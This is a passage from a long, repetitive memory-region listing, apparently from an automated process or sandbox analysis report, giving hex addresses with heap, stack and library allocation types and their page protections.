page read and write
66FF000
heap
page read and write
641F000
trusted library allocation
page read and write
865000
heap
page read and write
3420000
heap
page read and write
5AF0000
heap
page read and write
31CD000
heap
page read and write
598E000
stack
page read and write
3000000
trusted library allocation
page read and write
611E000
trusted library allocation
page read and write
4FA7000
heap
page read and write
739D000
stack
page read and write
8DF000
heap
page read and write
49B4000
heap
page read and write
7702000
heap
page read and write
8C60000
trusted library allocation
page execute and read and write
8AC8000
heap
page read and write
72DA000
stack
page read and write
76A0000
trusted library allocation
page read and write
561B000
heap
page read and write
85FE000
stack
page read and write
6795000
heap
page read and write
5E11000
heap
page read and write
73E0000
heap
page read and write
857F000
stack
page read and write
77A0000
heap
page read and write
7F468000
trusted library allocation
page execute and read and write
2D2C000
stack
page read and write
701E000
stack
page read and write
49DE000
stack
page read and write
52EA000
trusted library allocation
page read and write
601F000
heap
page read and write
6CFF000
trusted library allocation
page read and write
6004000
heap
page read and write
749E000
heap
page read and write
3215000
heap
page read and write
6500000
trusted library allocation
page read and write
5540000
heap
page execute and read and write
6115000
trusted library allocation
page read and write
561B000
heap
page read and write
611A000
trusted library allocation
page read and write
5E44000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
510C000
trusted library allocation
page read and write
335E000
stack
page read and write
5595000
heap
page read and write
3598000
heap
page read and write
53FA000
stack
page read and write
2F8F000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
89F0000
trusted library allocation
page read and write
72DF000
stack
page read and write
34B5000
heap
page read and write
4C7E000
stack
page read and write
920000
heap
page read and write
731D000
stack
page read and write
6780000
heap
page read and write
124E000
heap
page read and write
1090000
heap
page read and write
6CDF000
trusted library allocation
page read and write
5617000
heap
page read and write
6023000
heap
page read and write
55BF000
stack
page read and write
3043000
trusted library allocation
page execute and read and write
34D0000
heap
page read and write
6CFF000
trusted library allocation
page read and write
34DD000
heap
page read and write
56C1000
heap
page read and write
542D000
heap
page read and write
2F81000
trusted library allocation
page read and write
56C2000
heap
page read and write
31A2000
trusted library allocation
page read and write
6121000
trusted library allocation
page read and write
4844000
heap
page read and write
8520000
trusted library allocation
page read and write
78D0000
trusted library section
page read and write
67E0000
heap
page read and write
7B84000
heap
page read and write
588A000
trusted library allocation
page read and write
52EE000
trusted library allocation
page read and write
877000
heap
page read and write
7730000
trusted library allocation
page read and write
677A000
heap
page read and write
608C000
heap
page read and write
5018000
trusted library allocation
page read and write
340E000
stack
page read and write
7C8A000
trusted library allocation
page read and write
B4E000
stack
page read and write
7790000
trusted library allocation
page execute and read and write
56D1000
heap
page read and write
6125000
trusted library allocation
page read and write
746F000
heap
page read and write
676A000
heap
page read and write
7782000
heap
page read and write
E89000
heap
page read and write
4D91000
trusted library allocation
page read and write
65A0000
trusted library allocation
page read and write
8DF000
heap
page read and write
7769000
heap
page read and write
8E4E000
stack
page read and write
7650000
trusted library allocation
page read and write
D76000
heap
page read and write
34E3000
heap
page read and write
739E000
stack
page read and write
8DB000
heap
page read and write
6CFF000
trusted library allocation
page read and write
611E000
trusted library allocation
page read and write
34DD000
heap
page read and write
601F000
heap
page read and write
8DB000
heap
page read and write
765A000
stack
page read and write
3040000
trusted library allocation
page read and write
D00000
heap
page read and write
7B29000
heap
page read and write
3080000
trusted library allocation
page read and write
5380000
heap
page read and write
7E80000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
3560000
trusted library allocation
page read and write
5F49000
trusted library allocation
page read and write
61C0000
trusted library allocation
page read and write
5612000
heap
page read and write
672C000
heap
page read and write
7760000
trusted library allocation
page read and write
90D000
heap
page read and write
6799000
heap
page read and write
758E000
stack
page read and write
31E0000
trusted library allocation
page execute and read and write
4840000
heap
page read and write
79EE000
stack
page read and write
7710000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
81D0000
trusted library allocation
page read and write
8DF000
heap
page read and write
6020000
heap
page read and write
73F0000
trusted library allocation
page read and write
2D30000
heap
page read and write
6F5E000
stack
page read and write
640000
heap
page read and write
869B000
stack
page read and write
767F000
stack
page read and write
6480000
trusted library allocation
page read and write
52F3000
trusted library allocation
page read and write
4E0D000
trusted library allocation
page read and write
2F66000
trusted library allocation
page read and write
33A0000
heap
page read and write
56C2000
heap
page read and write
5DB9000
trusted library allocation
page read and write
7C16000
heap
page read and write
6125000
trusted library allocation
page read and write
F40000
heap
page read and write
DA0000
heap
page read and write
6123000
heap
page read and write
4CD0000
heap
page execute and read and write
81C0000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
34D0000
heap
page read and write
7250000
trusted library allocation
page execute and read and write
6CBC000
trusted library allocation
page read and write
75DE000
stack
page read and write
678A000
heap
page read and write
54BF000
stack
page read and write
4F9B000
heap
page read and write
77B0000
trusted library allocation
page execute and read and write
3170000
heap
page read and write
4EAD000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
F1E000
stack
page read and write
E3E000
stack
page read and write
759E000
stack
page read and write
7BAC000
heap
page read and write
883000
heap
page read and write
F8E000
stack
page read and write
71A0000
direct allocation
page read and write
6E9E000
stack
page read and write
5481000
heap
page read and write
10E0000
trusted library allocation
page read and write
5ECA000
heap
page read and write
4FC000
stack
page read and write
611A000
trusted library allocation
page read and write
795E000
stack
page read and write
560D000
heap
page read and write
67A7000
heap
page read and write
508E000
trusted library allocation
page read and write
6D09000
trusted library allocation
page read and write
930000
heap
page read and write
3212000
heap
page read and write
3408000
heap
page read and write
8D2000
heap
page read and write
7D3F000
stack
page read and write
788000
heap
page read and write
56C8000
heap
page read and write
34D0000
heap
page read and write
34B7000
heap
page read and write
67BC000
heap
page read and write
607B000
heap
page read and write
331F000
stack
page read and write
66F2000
heap
page read and write
70AA000
stack
page read and write
7CB0000
heap
page execute and read and write
77E0000
heap
page read and write
D8E000
stack
page read and write
67A7000
heap
page read and write
5ECB000
heap
page read and write
74BB000
trusted library allocation
page read and write
6044000
heap
page read and write
672D000
heap
page read and write
4A30000
heap
page read and write
601C000
heap
page read and write
111D000
trusted library allocation
page execute and read and write
3510000
trusted library allocation
page read and write
55F0000
heap
page read and write
5302000
trusted library allocation
page read and write
7679000
heap
page read and write
7CFE000
stack
page read and write
76FD000
stack
page read and write
3570000
heap
page readonly
6600000
trusted library allocation
page execute and read and write
4C3E000
stack
page read and write
6580000
trusted library allocation
page read and write
6765000
heap
page read and write
86E000
heap
page read and write
7770000
heap
page read and write
6A03000
heap
page read and write
666F000
heap
page read and write
549D000
heap
page read and write
56EE000
heap
page read and write
87E000
heap
page read and write
6CDF000
trusted library allocation
page read and write
65F0000
heap
page read and write
54BC000
stack
page read and write
55C1000
heap
page read and write
719D000
stack
page read and write
7512000
heap
page read and write
51D0000
trusted library allocation
page read and write
7480000
heap
page read and write
66F7000
heap
page read and write
37A7000
heap
page read and write
8A92000
heap
page read and write
E90000
heap
page read and write
7620000
trusted library allocation
page read and write
6799000
heap
page read and write
31AA000
heap
page read and write
D4E000
stack
page read and write
1160000
trusted library allocation
page execute and read and write
90D000
heap
page read and write
611A000
trusted library allocation
page read and write
750000
heap
page read and write
5E85000
heap
page read and write
33C0000
heap
page execute and read and write
6002000
heap
page read and write
35BB000
heap
page read and write
7AE0000
trusted library allocation
page read and write
4CD5000
heap
page execute and read and write
77C0000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
769E000
stack
page read and write
5480000
heap
page read and write
F37000
heap
page read and write
E50000
heap
page read and write
7260000
direct allocation
page read and write
A60E000
stack
page read and write
2E70000
heap
page execute and read and write
86E000
heap
page read and write
54CF000
stack
page read and write
326D000
heap
page read and write
4EB0000
heap
page read and write
894D000
stack
page read and write
729E000
stack
page read and write
723D000
stack
page read and write
706E000
stack
page read and write
6F9E000
stack
page read and write
553D000
stack
page read and write
72CD000
stack
page read and write
4FA5000
heap
page read and write
342E000
unkown
page read and write
5560000
trusted library allocation
page read and write
6795000
heap
page read and write
95D1000
trusted library allocation
page read and write
744D000
heap
page read and write
6D6E000
stack
page read and write
3410000
trusted library allocation
page read and write
6125000
trusted library allocation
page read and write
64D0000
trusted library allocation
page read and write
7DBD000
stack
page read and write
5F4E000
heap
page read and write
6F60000
heap
page execute and read and write
344E000
stack
page read and write
710C000
stack
page read and write
FE0000
heap
page read and write
6010000
heap
page read and write
331D000
stack
page read and write
1104000
trusted library allocation
page read and write
31D0000
heap
page readonly
D4E000
stack
page read and write
2E81000
trusted library allocation
page read and write
3EE2000
trusted library allocation
page read and write
87D000
heap
page read and write
740F000
heap
page read and write
31C0000
heap
page read and write
66F4000
heap
page read and write
74B0000
trusted library allocation
page read and write
6022000
heap
page read and write
6430000
trusted library allocation
page read and write
321E000
heap
page read and write
56ED000
heap
page read and write
4EB0000
trusted library allocation
page read and write
D0E000
stack
page read and write
5453000
heap
page read and write
504E000
trusted library allocation
page read and write
743A000
heap
page read and write
483E000
stack
page read and write
6660000
trusted library allocation
page read and write
4A10000
heap
page read and write
81E0000
heap
page read and write
1096000
heap
page read and write
7240000
direct allocation
page read and write
6742000
heap
page read and write
55E9000
heap
page read and write
3290000
heap
page read and write
5497000
heap
page read and write
764E000
stack
page read and write
5473000
heap
page read and write
5DF3000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
2E50000
heap
page read and write
77C0000
trusted library allocation
page read and write
31F0000
heap
page read and write
33D0000
heap
page read and write
607B000
heap
page read and write
3488000
heap
page read and write
7630000
trusted library allocation
page read and write
86D0000
heap
page read and write
85E000
heap
page read and write
3045000
trusted library allocation
page execute and read and write
3174000
trusted library allocation
page read and write
4D5C000
stack
page read and write
873000
heap
page read and write
6799000
heap
page read and write
317D000
trusted library allocation
page execute and read and write
3290000
heap
page read and write
7640000
trusted library allocation
page read and write
6ED5000
heap
page execute and read and write
611C000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
73B0000
heap
page read and write
52C0000
trusted library allocation
page read and write
4970000
trusted library allocation
page read and write
6015000
heap
page read and write
632D000
stack
page read and write
7497000
heap
page read and write
4F23000
heap
page read and write
7DD0000
trusted library allocation
page execute and read and write
77A0000
trusted library allocation
page read and write
7A30000
trusted library allocation
page read and write
84F0000
heap
page read and write
3271000
heap
page read and write
6121000
trusted library allocation
page read and write
6773000
heap
page read and write
8900000
heap
page read and write
6044000
heap
page read and write
6738000
heap
page read and write
71E0000
direct allocation
page read and write
674E000
heap
page read and write
8AE4000
heap
page read and write
6A2F000
heap
page read and write
6FC0000
trusted library allocation
page read and write
611E000
trusted library allocation
page read and write
8890000
trusted library allocation
page execute and read and write
601D000
heap
page read and write
5D7F000
stack
page read and write
558E000
stack
page read and write
C17000
heap
page read and write
673F000
heap
page read and write
4F7E000
stack
page read and write
67A7000
heap
page read and write
5590000
heap
page read and write
3082000
trusted library allocation
page read and write
525F000
trusted library allocation
page read and write
8320000
trusted library allocation
page read and write
60E4000
heap
page read and write
400000
remote allocation
page execute and read and write
6347000
heap
page read and write
3350000
heap
page read and write
871000
heap
page read and write
5714000
heap
page read and write
97C000
stack
page read and write
6CDF000
trusted library allocation
page read and write
363E000
stack
page read and write
3450000
heap
page read and write
76B0000
trusted library allocation
page read and write
5F11000
heap
page read and write
3738000
trusted library allocation
page read and write
322D000
heap
page read and write
6CDF000
trusted library allocation
page read and write
4EF7000
trusted library allocation
page read and write
605A000
heap
page read and write
6949000
trusted library allocation
page read and write
7C87000
trusted library allocation
page read and write
74C0000
heap
page execute and read and write
55C9000
heap
page read and write
71AA000
stack
page read and write
53CE000
stack
page read and write
7E00000
trusted library allocation
page read and write
601F000
heap
page read and write
B60000
heap
page read and write
3503000
trusted library allocation
page execute and read and write
2F38000
trusted library allocation
page read and write
6117000
trusted library allocation
page read and write
E39000
stack
page read and write
884000
heap
page read and write
73DF000
heap
page read and write
84FF000
stack
page read and write
576F000
trusted library allocation
page read and write
6778000
heap
page read and write
6785000
heap
page read and write
63E000
stack
page read and write
8D2000
heap
page read and write
7290000
heap
page read and write
E6C1000
trusted library allocation
page read and write
86A000
heap
page read and write
496E000
stack
page read and write
56C7000
heap
page read and write
735B000
stack
page read and write
6125000
trusted library allocation
page read and write
EDD000
stack
page read and write
745E000
stack
page read and write
6CDF000
trusted library allocation
page read and write
4A1E000
stack
page read and write
67A7000
heap
page read and write
34FC000
heap
page read and write
578E000
trusted library allocation
page read and write
61CF000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
5151000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
7693000
trusted library allocation
page read and write
8DB000
heap
page read and write
119A000
heap
page read and write
6360000
trusted library allocation
page read and write
7F450000
trusted library allocation
page execute and read and write
7E90000
trusted library allocation
page read and write
678A000
heap
page read and write
75F0000
trusted library allocation
page execute and read and write
676A000
heap
page read and write
677A000
heap
page read and write
6A02000
heap
page read and write
6CFF000
trusted library allocation
page read and write
BBA000
stack
page read and write
8530000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
8690000
direct allocation
page read and write
6125000
trusted library allocation
page read and write
66F7000
heap
page read and write
34D0000
heap
page read and write
7880000
heap
page execute and read and write
6046000
heap
page read and write
4FA7000
heap
page read and write
6701000
heap
page read and write
6F2D000
stack
page read and write
6799000
heap
page read and write
65E1000
heap
page read and write
34E3000
heap
page read and write
74B2000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
4FA5000
heap
page read and write
6437000
trusted library allocation
page read and write
7A60000
trusted library allocation
page read and write
607B000
heap
page read and write
6CFF000
trusted library allocation
page read and write
8D2000
heap
page read and write
79AE000
stack
page read and write
7670000
trusted library allocation
page read and write
6772000
heap
page read and write
5C3E000
stack
page read and write
F0B000
heap
page read and write
543D000
heap
page read and write
607B000
heap
page read and write
6EC0000
heap
page execute and read and write
3274000
heap
page read and write
6CBC000
trusted library allocation
page read and write
34C0000
heap
page read and write
8880000
heap
page read and write
1178000
heap
page read and write
6CDF000
trusted library allocation
page read and write
4FA7000
heap
page read and write
3520000
trusted library allocation
page read and write
86E000
heap
page read and write
6116000
trusted library allocation
page read and write
746D000
heap
page read and write
579E000
stack
page read and write
86E0000
heap
page read and write
345C000
heap
page read and write
543E000
heap
page read and write
F6C000
stack
page read and write
60B0000
heap
page read and write
6126000
trusted library allocation
page read and write
3590000
heap
page read and write
35FE000
stack
page read and write
7C80000
trusted library allocation
page read and write
1000000
heap
page read and write
678A000
heap
page read and write
60DF000
heap
page read and write
73F2000
heap
page read and write
52FD000
trusted library allocation
page read and write
6CBC000
trusted library allocation
page read and write
8A50000
heap
page read and write
605A000
heap
page read and write
316E000
stack
page read and write
5F9C000
heap
page read and write
31A0000
heap
page read and write
605A000
heap
page read and write
7B10000
trusted library allocation
page read and write
6CBC000
trusted library allocation
page read and write
79DE000
stack
page read and write
666F000
heap
page read and write
4D80000
heap
page read and write
DA7000
heap
page read and write
76C0000
trusted library allocation
page read and write
852000
heap
page read and write
4CBE000
stack
page read and write
11A8000
heap
page read and write
55E4000
heap
page read and write
611C000
trusted library allocation
page read and write
8DF000
heap
page read and write
6CFF000
trusted library allocation
page read and write
6990000
heap
page read and write
7B99000
heap
page read and write
86D7000
heap
page read and write
4DF3000
trusted library allocation
page read and write
4E47000
trusted library allocation
page read and write
678A000
heap
page read and write
861000
heap
page read and write
34DD000
heap
page read and write
861000
heap
page read and write
6CDF000
trusted library allocation
page read and write
6706000
heap
page read and write
30D0000
heap
page read and write
310E000
stack
page read and write
6A32000
heap
page read and write
547E000
heap
page read and write
5F4E000
heap
page read and write
35C1000
heap
page read and write
8D2000
heap
page read and write
7E0000
heap
page read and write
6A10000
heap
page read and write
791E000
stack
page read and write
8DF000
heap
page read and write
C8C000
stack
page read and write
6CFF000
trusted library allocation
page read and write
792E000
stack
page read and write
7B10000
trusted library allocation
page read and write
7760000
heap
page read and write
7DF0000
trusted library allocation
page read and write
BF0000
heap
page read and write
763E000
stack
page read and write
4980000
heap
page execute and read and write
89E2000
trusted library allocation
page read and write
76DB000
stack
page read and write
549D000
heap
page read and write
EF9000
stack
page read and write
6772000
heap
page read and write
34BC000
heap
page read and write
F20000
heap
page read and write
6799000
heap
page read and write
86C0000
heap
page read and write
55C0000
heap
page read and write
6795000
heap
page read and write
6CFF000
trusted library allocation
page read and write
6F1E000
stack
page read and write
34F6000
heap
page read and write
8713000
heap
page read and write
67BC000
heap
page read and write
6CDF000
trusted library allocation
page read and write
6CBC000
trusted library allocation
page read and write
5114000
trusted library allocation
page read and write
6433000
trusted library allocation
page read and write
3580000
trusted library allocation
page execute and read and write
EBE000
heap
page read and write
34CD000
heap
page read and write
48E5000
trusted library allocation
page read and write
7A21000
heap
page read and write
89CE000
stack
page read and write
5482000
heap
page read and write
6E5D000
stack
page read and write
796E000
stack
page read and write
66FD000
heap
page read and write
F7B000
stack
page read and write
34FB000
heap
page read and write
722E000
stack
page read and write
4FA7000
heap
page read and write
8728000
heap
page read and write
70EE000
stack
page read and write
611E000
trusted library allocation
page read and write
588E000
stack
page read and write
600D000
heap
page read and write
76E1000
heap
page read and write
34F0000
trusted library allocation
page read and write
6739000
heap
page read and write
6CBC000
trusted library allocation
page read and write
678C000
heap
page read and write
611C000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
2F59000
trusted library allocation
page read and write
677A000
heap
page read and write
7471000
heap
page read and write
676D000
heap
page read and write
D70000
heap
page read and write
6CDF000
trusted library allocation
page read and write
775E000
stack
page read and write
67A7000
heap
page read and write
6CDF000
trusted library allocation
page read and write
4F6A000
heap
page read and write
678C000
heap
page read and write
3042000
trusted library allocation
page read and write
676D000
heap
page read and write
339E000
stack
page read and write
676C000
heap
page read and write
5497000
heap
page read and write
5432000
heap
page read and write
3014000
trusted library allocation
page read and write
4EA8000
trusted library allocation
page read and write
4EAB000
trusted library allocation
page read and write
1100000
trusted library allocation
page read and write
656E000
stack
page read and write
67A7000
heap
page read and write
66FD000
heap
page read and write
878000
heap
page read and write
3050000
trusted library allocation
page read and write
8DF000
heap
page read and write
7890000
trusted library allocation
page read and write
3059000
trusted library allocation
page read and write
890E000
stack
page read and write
88A0000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
5445000
heap
page read and write
6121000
trusted library allocation
page read and write
67BC000
heap
page read and write
605A000
heap
page read and write
678C000
heap
page read and write
8670000
direct allocation
page read and write
853000
heap
page read and write
7660000
trusted library allocation
page read and write
611E000
trusted library allocation
page read and write
6118000
trusted library allocation
page read and write
935000
heap
page read and write
6121000
trusted library allocation
page read and write
7B46000
heap
page read and write
60E4000
heap
page read and write
77D0000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
1103000
trusted library allocation
page execute and read and write
7710000
trusted library allocation
page execute and read and write
60E5000
heap
page read and write
6702000
heap
page read and write
5F57000
heap
page read and write
67BC000
heap
page read and write
3060000
heap
page read and write
6128000
trusted library allocation
page read and write
6509000
heap
page read and write
5410000
heap
page read and write
6125000
trusted library allocation
page read and write
85A1000
trusted library allocation
page read and write
5613000
heap
page read and write
7720000
trusted library allocation
page read and write
666F000
heap
page read and write
34FC000
heap
page read and write
34DD000
heap
page read and write
611E000
trusted library allocation
page read and write
7120000
heap
page read and write
561B000
heap
page read and write
66C9000
heap
page read and write
34E2000
heap
page read and write
514F000
trusted library allocation
page read and write
34E9000
heap
page read and write
6046000
heap
page read and write
8C81000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
7485000
heap
page read and write
528D000
stack
page read and write
56C1000
heap
page read and write
548F000
heap
page read and write
5DBC000
stack
page read and write
8D2000
heap
page read and write
73DE000
stack
page read and write
4E9A000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
6781000
heap
page read and write
F13000
heap
page read and write
561B000
heap
page read and write
1BD000
stack
page read and write
6CFF000
trusted library allocation
page read and write
7459000
heap
page read and write
3720000
heap
page execute and read and write
34D0000
heap
page read and write
34D0000
heap
page read and write
6125000
trusted library allocation
page read and write
6125000
trusted library allocation
page read and write
6113000
trusted library allocation
page read and write
879000
heap
page read and write
53E6000
trusted library allocation
page read and write
6799000
heap
page read and write
34D0000
heap
page read and write
7680000
trusted library allocation
page read and write
71DB000
stack
page read and write
6121000
trusted library allocation
page read and write
3504000
trusted library allocation
page read and write
67BC000
heap
page read and write
5F42000
trusted library allocation
page read and write
6785000
heap
page read and write
65C0000
trusted library allocation
page execute and read and write
3087000
trusted library allocation
page execute and read and write
52E2000
trusted library allocation
page read and write
564C000
stack
page read and write
35CB000
heap
page read and write
6125000
trusted library allocation
page read and write
54D0000
heap
page read and write
77E0000
trusted library allocation
page read and write
6125000
trusted library allocation
page read and write
76D1000
heap
page read and write
34C0000
heap
page read and write
7DC0000
trusted library allocation
page read and write
855E000
stack
page read and write
52D6000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
822000
heap
page read and write
6780000
heap
page read and write
67EF000
heap
page read and write
5D99000
trusted library allocation
page read and write
3173000
trusted library allocation
page execute and read and write
51DE000
trusted library allocation
page read and write
67BC000
heap
page read and write
EF3000
heap
page read and write
36CE000
stack
page read and write
7700000
trusted library allocation
page execute and read and write
313E000
stack
page read and write
34E6000
heap
page read and write
6799000
heap
page read and write
F46000
heap
page read and write
674F000
heap
page read and write
6A10000
heap
page read and write
8B7000
heap
page read and write
5E05000
trusted library allocation
page read and write
734C000
stack
page read and write
3500000
trusted library allocation
page read and write
565B000
heap
page read and write
676D000
heap
page read and write
6CDF000
trusted library allocation
page read and write
546F000
heap
page read and write
6778000
heap
page read and write
542C000
heap
page read and write
E80000
heap
page read and write
33BE000
stack
page read and write
8D2000
heap
page read and write
6CDF000
trusted library allocation
page read and write
67BC000
heap
page read and write
11A6000
heap
page read and write
2E3F000
stack
page read and write
75CE000
stack
page read and write
6788000
heap
page read and write
70E0000
heap
page read and write
561B000
heap
page read and write
66FF000
heap
page read and write
6CFF000
trusted library allocation
page read and write
6CBC000
trusted library allocation
page read and write
34E3000
heap
page read and write
5291000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
67A000
stack
page read and write
48E1000
trusted library allocation
page read and write
8DF000
heap
page read and write
6125000
trusted library allocation
page read and write
676A000
heap
page read and write
6D46000
trusted library allocation
page read and write
4846000
heap
page read and write
6724000
heap
page read and write
6CFF000
trusted library allocation
page read and write
4ECE000
heap
page read and write
3400000
heap
page read and write
607B000
heap
page read and write
30B0000
heap
page readonly
6587000
trusted library allocation
page read and write
544E000
heap
page read and write
6CBC000
trusted library allocation
page read and write
60E4000
heap
page read and write
6CFF000
trusted library allocation
page read and write
336E000
stack
page read and write
32DC000
stack
page read and write
8DB000
heap
page read and write
C10000
heap
page read and write
599E000
stack
page read and write
6340000
heap
page read and write
34BD000
heap
page read and write
4F39000
trusted library allocation
page read and write
4A57000
heap
page read and write
3535000
trusted library allocation
page execute and read and write
6DDE000
stack
page read and write
48CF000
stack
page read and write
66FD000
heap
page read and write
672D000
heap
page read and write
3085000
trusted library allocation
page execute and read and write
600D000
heap
page read and write
1132000
trusted library allocation
page read and write
611C000
trusted library allocation
page read and write
750E000
stack
page read and write
676D000
heap
page read and write
55D3000
heap
page read and write
903000
heap
page read and write
73D0000
trusted library allocation
page read and write
7B7E000
heap
page read and write
7718000
heap
page read and write
7B79000
heap
page read and write
799E000
stack
page read and write
6E5E000
stack
page read and write
678D000
heap
page read and write
673F000
heap
page read and write
5F46000
heap
page read and write
6113000
trusted library allocation
page read and write
8F5E000
stack
page read and write
85BD000
stack
page read and write
7A50000
trusted library allocation
page read and write
864000
heap
page read and write
371E000
stack
page read and write
34E3000
heap
page read and write
2E40000
trusted library allocation
page read and write
33A5000
heap
page read and write
546F000
heap
page read and write
7BD3000
heap
page read and write
7110000
heap
page read and write
6CDF000
trusted library allocation
page read and write
55C3000
heap
page read and write
672C000
heap
page read and write
607B000
heap
page read and write
52F1000
trusted library allocation
page read and write
3170000
trusted library allocation
page read and write
843000
heap
page read and write
6121000
trusted library allocation
page read and write
D021000
trusted library allocation
page read and write
6061000
heap
page read and write
3452000
heap
page read and write
903000
heap
page read and write
8BE000
stack
page read and write
91C000
stack
page read and write
34F8000
heap
page read and write
6FD5000
trusted library allocation
page read and write
6CBC000
trusted library allocation
page read and write
30FE000
stack
page read and write
5370000
heap
page read and write
7B00000
trusted library allocation
page read and write
34DE000
heap
page read and write
6783000
heap
page read and write
3603000
heap
page read and write
701E000
stack
page read and write
6570000
trusted library allocation
page read and write
6E1E000
stack
page read and write
6CBC000
trusted library allocation
page read and write
7446000
heap
page read and write
7AA0000
trusted library allocation
page read and write
3532000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
8D2000
heap
page read and write
1150000
trusted library allocation
page read and write
6A06000
heap
page read and write
55F9000
heap
page read and write
8510000
heap
page read and write
34E3000
heap
page read and write
66AA000
heap
page read and write
1126000
trusted library allocation
page execute and read and write
3140000
heap
page readonly
78B0000
trusted library allocation
page read and write
8DF000
heap
page read and write
867000
heap
page read and write
73DB000
stack
page read and write
7740000
trusted library allocation
page read and write
61CB000
trusted library allocation
page read and write
34DF000
heap
page read and write
7A2D000
stack
page read and write
72C2000
heap
page read and write
600D000
heap
page read and write
D621000
trusted library allocation
page read and write
2F64000
trusted library allocation
page read and write
7DE0000
trusted library allocation
page read and write
8500000
trusted library allocation
page execute and read and write
776000
stack
page read and write
600D000
heap
page read and write
6772000
heap
page read and write
B021000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
A4E000
stack
page read and write
6780000
heap
page read and write
7200000
direct allocation
page read and write
62F4000
trusted library allocation
page read and write
66F7000
heap
page read and write
6115000
trusted library allocation
page read and write
6677000
heap
page read and write
735E000
stack
page read and write
5F11000
heap
page read and write
31A0000
trusted library allocation
page read and write
6A20000
heap
page read and write
6CDF000
trusted library allocation
page read and write
4EDB000
trusted library allocation
page read and write
4DA1000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
312E000
stack
page read and write
55A4000
trusted library allocation
page read and write
74E000
stack
page read and write
6FB0000
trusted library allocation
page read and write
6044000
heap
page read and write
831E000
stack
page read and write
E7B000
stack
page read and write
4D70000
heap
page execute and read and write
66FF000
heap
page read and write
5A1C000
trusted library allocation
page read and write
61C7000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
3029000
trusted library allocation
page read and write
843000
heap
page read and write
672D000
heap
page read and write
86F000
heap
page read and write
7670000
heap
page read and write
67AB000
heap
page read and write
6127000
trusted library allocation
page read and write
7480000
heap
page execute and read and write
542F000
heap
page read and write
55FC000
heap
page read and write
36BD000
stack
page read and write
6780000
heap
page read and write
C1A000
heap
page read and write
8DF000
heap
page read and write
5443000
heap
page read and write
34F0000
heap
page read and write
7690000
trusted library allocation
page read and write
4EE7000
trusted library allocation
page read and write
676D000
heap
page read and write
4FA5000
heap
page read and write
600C000
heap
page read and write
3010000
trusted library allocation
page read and write
5440000
heap
page read and write
5078000
trusted library allocation
page read and write
5B80000
heap
page read and write
34C3000
heap
page read and write
611E000
trusted library allocation
page read and write
561B000
heap
page read and write
56D3000
heap
page read and write
6D00000
trusted library allocation
page read and write
87E000
heap
page read and write
77F0000
heap
page read and write
56F0000
heap
page read and write
6121000
trusted library allocation
page read and write
8510000
trusted library allocation
page read and write
56DE000
heap
page read and write
5F4E000
heap
page read and write
678A000
heap
page read and write
869E000
direct allocation
page read and write
6042000
heap
page read and write
E021000
trusted library allocation
page read and write
7491000
heap
page read and write
CF0000
heap
page read and write
56E9000
trusted library allocation
page read and write
646E000
stack
page read and write
113B000
trusted library allocation
page execute and read and write
6CBC000
trusted library allocation
page read and write
7240000
heap
page read and write
7400000
heap
page read and write
8DB000
heap
page read and write
7E50000
trusted library allocation
page read and write
6A32000
heap
page read and write
51D2000
trusted library allocation
page read and write
1130000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
600D000
heap
page read and write
8330000
trusted library allocation
page read and write
3044000
trusted library allocation
page read and write
729D000
stack
page read and write
C30000
heap
page read and write
705E000
stack
page read and write
565B000
heap
page read and write
8731000
heap
page read and write
513C000
stack
page read and write
34B0000
heap
page read and write
34DD000
heap
page read and write
71EE000
stack
page read and write
55DC000
heap
page read and write
67BD000
heap
page read and write
716E000
stack
page read and write
6046000
heap
page read and write
10F0000
heap
page read and write
67A7000
heap
page read and write
611E000
trusted library allocation
page read and write
5605000
heap
page read and write
760E000
stack
page read and write
34E5000
heap
page read and write
1137000
trusted library allocation
page execute and read and write
61DB000
trusted library allocation
page read and write
678C000
heap
page read and write
758E000
stack
page read and write
7FAA0000
trusted library allocation
page execute and read and write
85F000
heap
page read and write
2F95000
trusted library allocation
page read and write
6772000
heap
page read and write
66F4000
heap
page read and write
1110000
trusted library allocation
page read and write
67BC000
heap
page read and write
8DF000
heap
page read and write
611E000
trusted library allocation
page read and write
55D1000
heap
page read and write
6CDF000
trusted library allocation
page read and write
958000
stack
page read and write
2F3E000
trusted library allocation
page read and write
304D000
trusted library allocation
page execute and read and write
7EA0000
trusted library allocation
page read and write
712B000
stack
page read and write
89D0000
trusted library allocation
page read and write
8D2000
heap
page read and write
3519000
trusted library allocation
page read and write
4F9B000
heap
page read and write
65B0000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
324E000
heap
page read and write
4DEC000
trusted library allocation
page read and write
8AB2000
heap
page read and write
8DB000
heap
page read and write
378C000
stack
page read and write
3E81000
trusted library allocation
page read and write
6CBC000
trusted library allocation
page read and write
5F44000
heap
page read and write
C021000
trusted library allocation
page read and write
67A7000
heap
page read and write
7610000
trusted library allocation
page read and write
584E000
stack
page read and write
126C000
heap
page read and write
5138000
trusted library allocation
page read and write
3170000
trusted library allocation
page execute and read and write
8F9000
heap
page read and write
751D000
stack
page read and write
30E0000
heap
page read and write
66F4000
heap
page read and write
8DB000
heap
page read and write
82E000
heap
page read and write
3120000
